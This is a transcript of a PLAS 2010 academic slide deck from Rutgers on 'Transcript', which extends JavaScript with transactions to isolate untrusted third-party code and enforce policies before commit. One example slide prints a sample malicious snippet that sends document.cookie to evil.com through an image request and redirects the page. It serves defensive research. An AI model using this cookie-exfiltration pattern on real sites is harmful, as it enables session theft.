TRANSCRIPT
The Case for JavaScript Transactions
Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy
Department of Computer Science
Rutgers University
PLAS 2010
Problem
Web applications include third party content
Examples: widgets, advertisements, libraries
May contain untrusted, malicious JavaScript
April 18, 2023 2PLAS 2010
Example from nytimes.com
Rogue third party advertisement
Displayed image of fake virus scan
Client security and privacy at risk
Goal
Protect Web application data by isolating untrusted JavaScript code
Must handle arbitrary 3rd party code written in JavaScript, including constructs such as eval, this, with.
Must enforce powerful security policies, e.g. allow pop-ups from white-listed websites only.
Outline
Problem
Transcript
Example
Implementation
Related Work
Conclusion
Solution: Transcript
Extend JavaScript to support transactions
Execute untrusted content speculatively
Commit changes after policy enforcement
[Figure: a Transaction running inside the Web Application]
Transcript features
Speculative execution of unmodified third party JavaScript code
Suspend transactions on DOM and AJAX operations
Transactional execution of event handlers
Schematic use of Transcript

// Web application code
var tx = transaction{
    ...
    // unmodified 3rd party code
    ...
};
// Introspection block goes below
/* policy enforcement code */
// validate actions of the transaction
tx.commit();
// Rest of the Web application code

[Figure: the transaction block sits inside the Web application]
Outline
Problem
Transcript
Example
Implementation
Related Work
Conclusion
Example: Untrusted code

// Web application code
var tx = transaction{
    var image = document.createElement('img');
    var url = "http://evil.com/grabcookie.php";
    var params = document.cookie;
    image.src = url + "?cookie=" + params;
    document.body.appendChild(image);
    ...
    window.location = "http://evil.com";
};

[Figure: the transaction block sits inside the Web application]
Transaction suspend and resume

// Web application code...
tx = transaction {
    ...
    body.appendChild(image);
    ...
};
do {
    ...
    tx = tx.resume();
    ...
} while(tx.isSuspended());
tx.commit();
// ...Rest of the Web application

[Figure: the Transaction object tx holds the 3rd party code's read and write sets and its call stack, above the web app's call stack. Numbered steps 1 to 5 show the transaction suspending into the Transcript runtime system, the introspection block running, the resume, and the commit, after which Heap_new = Heap_orig + tx's write set.]

Transcript runtime
On a transaction suspend, the Transcript runtime saves (i) the read and write sets and (ii) the stack frames up to the nearest transaction delimiter, creating a Transaction object.
The Transcript runtime loads the saved read and write sets and stack frames when the transaction resumes.
The Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits.
Read and Write Sets

var tx = transaction{
    ...
    document.body.appendChild(image);
};
do {
    var rs = tx.getReadSet(), arg = tx.getArgs();
    switch(tx.getCause()) {
        case "appendChild":
            // obj: the node on which the suspended appendChild was called
            if (arg[0].nodeName.match("IMG") &&
                !rs.checkMembership(document,"cookie"))
                obj.appendChild(arg[0]);
            break;
    } /* end switch */
    tx = tx.resume();
} while(tx.isSuspended());

Policy (highlighted on the slide): the IMG is appended only if the transaction has not read document.cookie.

var tx = transaction{
    ...
    window.location = "http://evil.com";
};
/* Introspection Code */
var ws = tx.getWriteSet();
if(ws.checkMembership(window,"location")){
    var loc = ws.getValue(window, "location");
    if(!isWhiteListed(loc))
        to_commit = false;
}
// Rest of the web application code

Policy (highlighted on the slide): the write to window.location is committed only if the new location is white-listed.
Outline
Problem
Transcript
Example
Implementation
Related Work
Conclusion
Implementation
Prototype implementation in Firefox 3.7a4
Added new JavaScript features: the transaction keyword and the Transaction object
Modified interpreter op-codes to log all object accesses and to suspend on DOM / AJAX calls
For details on the semantics of transactions, please refer to the paper.
Outline
Problem
Transcript
Example
Implementation
Related Work
Conclusion
Related Work
Staged information flow in JavaScript (PLDI'09): hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code
ConScript (S&P'10): aspect-oriented framework to specify and enforce fine-grained security policies for Web applications
AdJail (USENIX Security'10): isolation mechanism to protect Web application content from malicious advertisements
Caja, FBJS, AdSafe, etc.
Conclusion
JavaScript transactions provide isolation: operations that break isolation are suspended, and resumed only if the web application allows them.
Enforcement of powerful security policies: all data reads / writes are recorded, and they can be inspected before commit.
No restriction or changes to third party code
Questions?